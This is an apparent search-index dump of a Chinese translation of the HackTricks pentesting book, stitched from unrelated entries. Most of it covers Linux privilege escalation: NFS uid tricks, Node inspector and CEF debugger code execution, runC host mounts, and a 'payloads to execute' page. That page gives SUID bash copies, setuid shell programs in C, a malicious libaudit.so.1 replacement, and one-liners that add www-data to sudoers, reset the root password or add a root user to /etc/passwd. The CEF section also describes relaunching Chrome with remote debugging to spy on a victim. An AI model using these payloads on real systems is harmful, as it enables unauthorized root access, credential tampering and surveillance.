no_root_squash/no_all_squash misconfiguration PE » Basic Information","id":"1873","title":"Basic Information"},"1874":{"body":"一旦获得 root 访问权限,为了在不更改所有权的情况下与 NFS 共享进行交互(以避免留下痕迹),使用一个 Python 脚本(nfsh.py)。该脚本调整 uid 以匹配正在访问的文件,从而允许在共享上与文件进行交互,而不会出现权限问题: python #!/usr/bin/env python\\n# script from https://www.errno.fr/nfs_privesc.html\\nimport sys\\nimport os def get_file_uid(filepath):\\ntry:\\nuid = os.stat(filepath).st_uid\\nexcept OSError as e:\\nreturn get_file_uid(os.path.dirname(filepath))\\nreturn uid filepath = sys.argv[-1]\\nuid = get_file_uid(filepath)\\nos.setreuid(uid, uid)\\nos.system(\' \'.join(sys.argv[1:])) 像这样运行: bash # ll ./mount/\\ndrwxr-x--- 6 1008 1009 1024 Apr 5 2017 9.3_old tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » NFS no_root_squash/no_all_squash misconfiguration PE » Bonus: NFShell for Stealthy File Access","id":"1874","title":"Bonus: NFShell for Stealthy File Access"},"1875":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » Node inspector/CEF debug abuse","id":"1875","title":"Node inspector/CEF debug abuse"},"1876":{"body":"来自文档 :当使用 --inspect 开关启动时,Node.js 进程会监听调试客户端。 默认情况下 ,它将在主机和端口 127.0.0.1:9229 上监听。每个进程还会分配一个 唯一 的 UUID 。 调试客户端必须知道并指定主机地址、端口和 UUID 以进行连接。完整的 URL 看起来像 ws://127.0.0.1:9229/0f2c936f-b1cd-4ac9-aab3-f63b0f33d55e。 warning 由于 调试器对 Node.js 执行环境具有完全访问权限 ,能够连接到此端口的恶意行为者可能能够代表 Node.js 进程执行任意代码( 潜在的权限提升 )。 启动调试器有几种方法: bash node --inspect app.js #Will run the inspector in port 9229\\nnode --inspect=4444 app.js #Will run the inspector in port 4444\\nnode --inspect=0.0.0.0:4444 app.js #Will run the inspector all ifaces and port 4444\\nnode --inspect-brk=0.0.0.0:4444 app.js #Will run the inspector all ifaces and port 4444\\n# --inspect-brk is equivalent to --inspect node --inspect --inspect-port=0 app.js #Will run the inspector in a random port\\n# Note that using \\"--inspect-port\\" without \\"--inspect\\" or \\"--inspect-brk\\" won\'t run the inspector 当你启动一个被检查的进程时,类似这样的内容将会出现: Debugger ending on ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d\\nFor help, see: https://nodejs.org/en/docs/inspector 基于 CEF ( Chromium Embedded Framework ) 的进程需要使用参数: --remote-debugging-port=9222 来打开 debugger (SSRF 保护仍然非常相似)。然而,它们 而不是 授予 NodeJS debug 会话,而是通过 Chrome DevTools Protocol 与浏览器进行通信,这是一个控制浏览器的接口,但没有直接的 RCE。 当你启动一个调试的浏览器时,类似这样的内容将会出现: DevTools listening on ws://127.0.0.1:9222/devtools/browser/7d7aa9d9-7c61-4114-b4c6-fcf5c35b4369","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » 基本信息","id":"1876","title":"基本信息"},"1877":{"body":"在网页浏览器中打开的网站可以在浏览器安全模型下进行 WebSocket 和 HTTP 请求。 初始 HTTP 连接 是 获取唯一调试器会话 ID 所必需的。 同源政策****防止 网站能够进行 此 HTTP 连接 。为了防止 DNS 重新绑定攻击 , Node.js 验证连接的**\'Host\' 头 是否精确指定了 IP 地址 或 localhost 或 localhost6**。 note 该 安全措施防止利用检查器 通过 仅发送 HTTP 请求 (这可以通过利用 SSRF 漏洞来完成)来运行代码。","breadcrumbs":"Linux Privilege Escalation » 
Node inspector/CEF debug abuse » 浏览器、WebSockets 和同源政策","id":"1877","title":"浏览器、WebSockets 和同源政策"},"1878":{"body":"您可以向正在运行的 nodejs 进程发送 信号 SIGUSR1 以使其在默认端口 启动检查器 。但是,请注意,您需要拥有足够的权限,因此这可能会授予您 对进程内部信息的特权访问 ,但不会直接提升权限。 bash kill -s SIGUSR1 \\n# After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d note 这在容器中很有用,因为 关闭进程并启动一个新进程 使用 --inspect 不是一个选项 ,因为 容器 将与进程一起 被终止 。","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » 在运行的进程中启动检查器","id":"1878","title":"在运行的进程中启动检查器"},"1879":{"body":"要连接到 基于Chromium的浏览器 ,可以访问 Chrome 或 Edge 的 chrome://inspect 或 edge://inspect URL。通过点击配置按钮,应该确保 目标主机和端口 正确列出。图像显示了一个远程代码执行 (RCE) 示例: 使用 命令行 ,您可以通过以下方式连接到调试器/检查器: bash node inspect :\\nnode inspect 127.0.0.1:9229\\n# RCE example from debug console\\ndebug> exec(\\"process.mainModule.require(\'child_process\').exec(\'/Applications/iTerm.app/Contents/MacOS/iTerm2\')\\") 该工具 https://github.com/taviso/cefdebug 允许 查找 本地运行的检查器并 注入代码 。 bash #List possible vulnerable sockets\\n./cefdebug.exe\\n#Check if possibly vulnerable\\n./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code \\"process.version\\"\\n#Exploit it\\n./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code \\"process.mainModule.require(\'child_process\').exec(\'calc\')\\" note 请注意,如果通过 Chrome DevTools Protocol 连接到浏览器, NodeJS RCE 漏洞将无法工作 (您需要检查 API 以找到有趣的操作)。","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » 连接到检查器/调试器","id":"1879","title":"连接到检查器/调试器"},"188":{"body":"即使是完美加固的交换机配置也可能被固件错误破坏。最近的例子包括: CVE-2022-20728† – Cisco Aironet/Catalyst接入点 允许从本地VLAN注入到非本地WLAN VLAN,绕过有线/无线分段。 **CVE-2024-20465 (Cisco IOS工业Ethernet)**允许在切换弹性以太网协议后在SVI上绕过ACL,泄漏VRF/VLAN之间的流量。补丁17.9.5或更高版本。 始终监控供应商关于VLAN相关绕过/ACL问题的建议,并保持基础设施映像的最新。","breadcrumbs":"Pentesting Network » Lateral VLAN Segmentation Bypass » 现实世界的供应商漏洞(2022-2024)","id":"188","title":"现实世界的供应商漏洞(2022-2024)"},"1880":{"body":"note 
如果您来这里是想了解如何从 Electron 中的 XSS 获取 RCE,请查看此页面。 一些常见的方法来获取 RCE 当您可以 连接 到 Node 检查器 时是使用类似的东西(看起来这 在连接到 Chrome DevTools 协议时不会工作 ): javascript process.mainModule.require(\\"child_process\\").exec(\\"calc\\")\\nwindow.appshell.app.openURLInDefaultBrowser(\\"c:/windows/system32/calc.exe\\")\\nrequire(\\"child_process\\").spawnSync(\\"calc.exe\\")\\nBrowser.open(JSON.stringify({ url: \\"c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\calc.exe\\" }))","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » NodeJS 调试器/检查器中的 RCE","id":"1880","title":"NodeJS 调试器/检查器中的 RCE"},"1881":{"body":"您可以在这里查看 API: https://chromedevtools.github.io/devtools-protocol/ 在本节中,我将列出我发现人们用来利用此协议的有趣内容。","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » Chrome DevTools Protocol Payloads","id":"1881","title":"Chrome DevTools Protocol Payloads"},"1882":{"body":"在 CVE-2021-38112 中,Rhino 安全发现基于 CEF 的应用程序 在系统中注册了一个自定义 URI (workspaces://index.html),该 URI 接收完整的 URI,然后 使用部分构造的配置启动 CEF 基于的应用程序 。 发现 URI 参数被 URL 解码并用于启动 CEF 基本应用程序,允许用户 注入 标志 --gpu-launcher 到 命令行 并执行任意操作。 因此,像这样的有效载荷: workspaces://anything%20--gpu-launcher=%22calc.exe%22@REGISTRATION_CODE 将执行 calc.exe。","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » 通过深层链接进行参数注入","id":"1882","title":"通过深层链接进行参数注入"},"1883":{"body":"更改 下载文件将要保存的文件夹 ,并下载一个文件以 覆盖 应用程序中常用的 源代码 ,用你的 恶意代码 替换。 javascript ws = new WebSocket(url) //URL of the chrome devtools service\\nws.send(\\nJSON.stringify({\\nid: 42069,\\nmethod: \\"Browser.setDownloadBehavior\\",\\nparams: {\\nbehavior: \\"allow\\",\\ndownloadPath: \\"/code/\\",\\n},\\n})\\n)","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » 覆盖文件","id":"1883","title":"覆盖文件"},"1884":{"body":"根据这篇文章: https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148 ,可以获得 RCE 并从 theriver 中外泄内部页面。","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » Webdriver RCE 
和外泄","id":"1884","title":"Webdriver RCE 和外泄"},"1885":{"body":"在真实环境中, 在攻陷 使用 Chrome/Chromium 浏览器的用户 PC 后,您可以启动一个 Chrome 进程, 激活调试并转发调试端口 ,以便您可以访问它。这样,您将能够 检查受害者在 Chrome 中所做的一切并窃取敏感信息 。 隐秘的方法是 终止每个 Chrome 进程 ,然后调用类似于 bash Start-Process \\"Chrome\\" \\"--remote-debugging-port=9222 --restore-last-session\\"","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » 后期利用","id":"1885","title":"后期利用"},"1886":{"body":"https://www.youtube.com/watch?v=iwR746pfTEc&t=6345s https://github.com/taviso/cefdebug https://iwantmore.pizza/posts/cve-2019-1414.html https://bugs.chromium.org/p/project-zero/issues/detail?id=773 https://bugs.chromium.org/p/project-zero/issues/detail?id=1742 https://bugs.chromium.org/p/project-zero/issues/detail?id=1944 https://nodejs.org/en/docs/guides/debugging-getting-started/ https://chromedevtools.github.io/devtools-protocol/ https://larry.science/post/corctf-2021/#saasme-2-solves https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » 参考文献","id":"1886","title":"参考文献"},"1887":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Payloads to execute » 执行的有效载荷","id":"1887","title":"执行的有效载荷"},"1888":{"body":"bash cp /bin/bash /tmp/b && chmod +s /tmp/b\\n/bin/b -p #Maintains root privileges from suid, working in debian & buntu","breadcrumbs":"Linux Privilege Escalation » Payloads to execute » Bash","id":"1888","title":"Bash"},"1889":{"body":"c //gcc payload.c -o payload\\nint main(void){\\nsetresuid(0, 0, 0); //Set as user suid user\\nsystem(\\"/bin/sh\\");\\nreturn 0;\\n} c //gcc payload.c -o payload\\n#include \\n#include \\n#include int main(){\\nsetuid(getuid());\\nsystem(\\"/bin/bash\\");\\nreturn 0;\\n} c // Privesc to user id: 1000\\n#define _GNU_SOURCE\\n#include \\n#include int main(void) {\\nchar *const paramList[10] = {\\"/bin/bash\\", \\"-p\\", NULL};\\nconst int id = 1000;\\nsetresuid(id, id, id);\\nexecve(paramList[0], paramList, NULL);\\nreturn 0;\\n}","breadcrumbs":"Linux Privilege Escalation » Payloads to execute » C","id":"1889","title":"C"},"189":{"body":"https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 VLANPWN攻击工具包 – https://github.com/casterbytethrowback/VLANPWN Twingate “什么是VLAN跳跃?”(2024年8月) – https://www.twingate.com/blog/glossary/vlan%20hopping VoIP Hopper项目 – https://github.com/hmgh0st/voiphopper Cisco建议 “cisco-sa-apvlan-TDTtb4FY” – https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apvlan-TDTtb4FY tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » Lateral VLAN Segmentation Bypass » 参考文献","id":"189","title":"参考文献"},"1890":{"body":"","breadcrumbs":"Linux Privilege Escalation » Payloads to execute » 通过覆盖文件来提升权限","id":"1890","title":"通过覆盖文件来提升权限"},"1891":{"body":"在 /etc/passwd 中添加带密码的用户 在 /etc/shadow 中更改密码 在 /etc/sudoers 中将用户添加到 sudoers 通过 docker socket 滥用 docker,通常在 /run/docker.sock 或 /var/run/docker.sock 中","breadcrumbs":"Linux Privilege Escalation » Payloads to execute » 常见文件","id":"1891","title":"常见文件"},"1892":{"body":"检查某个二进制文件使用的库,在这种情况下是 /bin/su: bash ldd /bin/su\\nlinux-vdso.so.1 (0x00007ffef06e9000)\\nlibpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000)\\nlibpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000)\\nlibaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000)\\nlibc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000)\\nlibdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000)\\nlibcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000)\\n/lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000) 在这种情况下,让我们尝试伪装 /lib/x86_64-linux-gnu/libaudit.so.1。 因此,检查 su 二进制文件使用的此库的函数: bash objdump -T /bin/su | grep audit\\n0000000000000000 DF *UND* 0000000000000000 audit_open\\n0000000000000000 DF *UND* 0000000000000000 audit_log_user_message\\n0000000000000000 DF *UND* 0000000000000000 audit_log_acct_message\\n000000000020e968 g DO .bss 0000000000000004 Base audit_fd 符号 audit_open、audit_log_acct_message、audit_log_acct_message 和 audit_fd 可能来自 libaudit.so.1 库。由于 libaudit.so.1 将被恶意共享库覆盖,因此这些符号应该出现在新的共享库中,否则程序将无法找到该符号并将退出。 c #include\\n#include\\n#include //gcc -shared -o /lib/x86_64-linux-gnu/libaudit.so.1 -fPIC inject.c int audit_open;\\nint audit_log_acct_message;\\nint audit_log_user_message;\\nint audit_fd; void inject()__attribute__((constructor)); void inject()\\n{\\nsetuid(0);\\nsetgid(0);\\nsystem(\\"/bin/bash\\");\\n} 现在,只需调用 
/bin/su ,您将获得一个以 root 身份运行的 shell。","breadcrumbs":"Linux Privilege Escalation » Payloads to execute » 覆盖库","id":"1892","title":"覆盖库"},"1893":{"body":"您能让 root 执行某些操作吗?","breadcrumbs":"Linux Privilege Escalation » Payloads to execute » 脚本","id":"1893","title":"脚本"},"1894":{"body":"bash echo \'chmod 777 /etc/sudoers && echo \\"www-data ALL=NOPASSWD:ALL\\" >> /etc/sudoers && chmod 440 /etc/sudoers\' > /tmp/update","breadcrumbs":"Linux Privilege Escalation » Payloads to execute » www-data 到 sudoers","id":"1894","title":"www-data 到 sudoers"},"1895":{"body":"bash echo \\"root:hacked\\" | chpasswd","breadcrumbs":"Linux Privilege Escalation » Payloads to execute » 更改根密码","id":"1895","title":"更改根密码"},"1896":{"body":"bash echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo \'$1$mysalt$7DTZJIc9s6z60L6aj0Sui.\') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Payloads to execute » 将新根用户添加到 /etc/passwd","id":"1896","title":"将新根用户添加到 /etc/passwd"},"1897":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » RunC Privilege Escalation » RunC 提权","id":"1897","title":"RunC 提权"},"1898":{"body":"如果你想了解更多关于 runc 的信息,请查看以下页面: 2375, 2376 Pentesting Docker","breadcrumbs":"Linux Privilege Escalation » RunC Privilege Escalation » 基本信息","id":"1898","title":"基本信息"},"1899":{"body":"如果你发现 runc 已安装在主机上,你可能能够 运行一个挂载主机根 / 文件夹的容器 。 bash runc -help #Get help and see if runc is intalled\\nrunc spec #This will create the config.json file in your current folder Inside the \\"mounts\\" section of the create config.json add the following lines:\\n{\\n\\"type\\": \\"bind\\",\\n\\"source\\": \\"/\\",\\n\\"destination\\": \\"/\\",\\n\\"options\\": [\\n\\"rbind\\",\\n\\"rw\\",\\n\\"rprivate\\"\\n]\\n}, #Once you have modified the config.json file, create the folder rootfs in the same directory\\nmkdir rootfs # Finally, start the container\\n# The root folder is the one from the host\\nrunc run demo caution 这并不总是有效,因为 runc 的默认操作是以 root 身份运行,因此以非特权用户身份运行它根本无法工作(除非您有无根配置)。将无根配置设为默认通常不是一个好主意,因为在无根容器内部有相当多的限制,而这些限制在无根容器外部并不适用。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » RunC Privilege Escalation » PE","id":"1899","title":"PE"},"19":{"body":"tip 非常感谢这些资源,我该如何感谢你们? 您可以在推特上公开感谢 HackTricks 团队将所有这些资源整理成公开内容,提及 @hacktricks_live 。 如果您特别感激,您也可以 在这里赞助该项目 。 并且不要忘记 在 Github 项目中给个星星! (在下面找到链接)。 tip 我该如何为该项目做贡献? 您可以 与社区分享新的技巧和窍门或修复您在书中发现的错误 ,通过向相应的 Github 页面发送 Pull Request : https://github.com/carlospolop/hacktricks https://github.com/carlospolop/hacktricks-cloud 不要忘记 在 Github 项目中给个星星! tip 我可以复制一些 HackTricks 的内容并放到我的博客吗? 
可以,但 不要忘记提及具体的链接 ,内容是从哪里获取的。 tip 我该如何引用 HackTricks 的页面? 只要您引用的页面的 链接 出现即可。 如果您需要 bibtex,您可以使用类似的格式: latex @misc{hacktricks-bibtexing,\\nauthor = {\\"HackTricks Team\\" or the Authors name of the specific page/trick},\\ntitle = {Title of the Specific Page},\\nyear = {Year of Last Update (check it at the end of the page)},\\nurl = {\\\\url{https://book.hacktricks.wiki/specific-page}},\\n} warning 我可以在我的博客中复制所有HackTricks吗? 我不建议这样做 。这 对任何人都没有好处 ,因为所有 内容已经在官方HackTricks书籍中免费公开 。 如果你担心它会消失,只需在Github上分叉或下载,如我所说,它已经是免费的。 warning 你们为什么有赞助商?HackTricks书籍是商业用途吗? 第一个 HackTricks 价值 是为 全世界 提供 免费的 黑客教育资源。HackTricks团队已经 投入了数千小时 来提供这些内容,再次强调,都是 免费的 。 如果你认为HackTricks书籍是为了 商业目的 而制作的,你是 完全错误的 。 我们有赞助商,因为即使所有内容都是免费的,我们也希望 给社区提供欣赏我们工作的可能性 ,如果他们愿意。因此,我们提供人们通过 Github赞助商 向HackTricks捐款的选项,以及 相关的网络安全公司 赞助HackTricks并在书中 放置一些广告 ,这些 广告 总是放在不会干扰学习过程的地方,以便让人们在专注于内容时仍能看到。 你不会发现HackTricks充满了烦人的广告,就像其他内容远不如HackTricks的博客,因为HackTricks不是为了商业目的而制作的。 caution 如果某个HackTricks页面基于我的博客文章但没有引用,我该怎么办? 我们非常抱歉。这不应该发生 。请通过Github问题、Twitter、Discord等告知我们HackTricks页面的链接和你的博客链接, 我们会尽快检查并添加引用 。 caution 如果HackTricks中有我博客的内容而我不希望它在那里,我该怎么办? 请注意,在HackTricks中链接到你的页面: 改善你的 SEO 内容被 翻译成超过15种语言 ,使更多人能够访问这些内容 HackTricks鼓励 人们 查看你的页面 (有几个人提到,自从他们的某个页面出现在HackTricks中,他们的访问量增加了) 然而,如果你仍然希望从HackTricks中删除你博客的内容,请告知我们,我们将 删除所有指向你博客的链接 ,以及任何基于该内容的内容。 caution 如果我在HackTricks中发现抄袭的内容,我该怎么办? 我们始终 给予原作者所有的信用 。如果你发现某个页面有抄袭的内容而没有引用原始来源,请告知我们,我们将 删除它 、 在文本前添加链接 ,或 重写并添加链接 。","breadcrumbs":"HackTricks Values & FAQ » HackTricks 常见问题","id":"19","title":"HackTricks 常见问题"},"190":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 mDNS 协议旨在在小型本地网络中进行 IP 地址解析,而无需专用名称服务器。它通过在子网内进行多播查询,促使指定名称的主机以其 IP 地址进行响应。子网中的所有设备可以使用此信息更新其 mDNS 缓存。 需要注意的关键点: 域名放弃 :主机可以通过发送 TTL 为零的数据包来释放其域名。 使用限制 :mDNS 通常仅解析以 .local 结尾的名称。在此域中与非 mDNS 主机的冲突需要网络配置调整。 网络详细信息 : 以太网多播 MAC 地址:IPv4 - 01:00:5E:00:00:FB,IPv6 - 33:33:00:00:00:FB。 IP 地址:IPv4 - 224.0.0.251,IPv6 - ff02::fb。 通过 UDP 端口 5353 操作。 mDNS 查询仅限于本地网络,不跨越路由器。","breadcrumbs":"Pentesting Network » Network Protocols Explained (ESP) » 多播 DNS (mDNS)","id":"190","title":"多播 DNS (mDNS)"},"1900":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 来自redhat文档的介绍和示例 SELinux 是一个 标签 系统 。每个 进程 和每个 文件 系统对象都有一个 标签 。SELinux 策略定义了关于 进程标签可以对系统上所有其他标签执行的操作 的规则。 容器引擎以单个受限的 SELinux 标签启动 容器进程 ,通常为 container_t,然后将容器内部的容器设置为标签 container_file_t。SELinux 策略规则基本上表示 container_t 进程只能读取/写入/执行标记为 container_file_t 的文件 。如果容器进程逃离容器并尝试写入主机上的内容,Linux 内核将拒绝访问,并仅允许容器进程写入标记为 container_file_t 的内容。 shell $ podman run -d fedora sleep 100\\nd4194babf6b877c7100e79de92cd6717166f7302113018686cea650ea40bd7cb\\n$ podman top -l label\\nLABEL\\nsystem_u:system_r:container_t:s0:c647,c780","breadcrumbs":"Linux Privilege Escalation » SELinux » 容器中的SELinux","id":"1900","title":"容器中的SELinux"},"1901":{"body":"除了常规的 Linux 用户,还有 SELinux 用户。SELinux 用户是 SELinux 策略的一部分。每个 Linux 用户都映射到一个 SELinux 用户,作为策略的一部分。这允许 Linux 用户继承施加在 SELinux 用户上的限制和安全规则与机制。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » SELinux » SELinux 用户","id":"1901","title":"SELinux 用户"},"1902":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 在以下示例中, 创建了一个 unix socket (/tmp/socket_test.s),并且所有 接收到的内容 都将由 os.system 执行 。我知道你在现实中不会找到这个,但这个示例的目的是看看使用 unix sockets 的代码是怎样的,以及如何在最糟糕的情况下管理输入。 s.py import socket\\nimport os, os.path\\nimport time\\nfrom collections import deque if os.path.exists(\\"/tmp/socket_test.s\\"):\\nos.remove(\\"/tmp/socket_test.s\\") server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\\nserver.bind(\\"/tmp/socket_test.s\\")\\nos.system(\\"chmod o+w /tmp/socket_test.s\\")\\nwhile True:\\nserver.listen(1)\\nconn, addr = server.accept()\\ndatagram = conn.recv(1024)\\nif datagram:\\nprint(datagram)\\nos.system(datagram)\\nconn.close() 执行 代码使用python: python s.py 并 检查socket的监听状态 : python netstat -a -p --unix | grep \\"socket_test\\"\\n(Not all processes could be identified, non-owned process info\\nwill not be shown, you would have to be root to see it all.)\\nunix 2 [ ACC ] STREAM LISTENING 901181 132748/python /tmp/socket_test.s 利用 python echo \\"cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;\\" | socat - UNIX-CLIENT:/tmp/socket_test.s tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
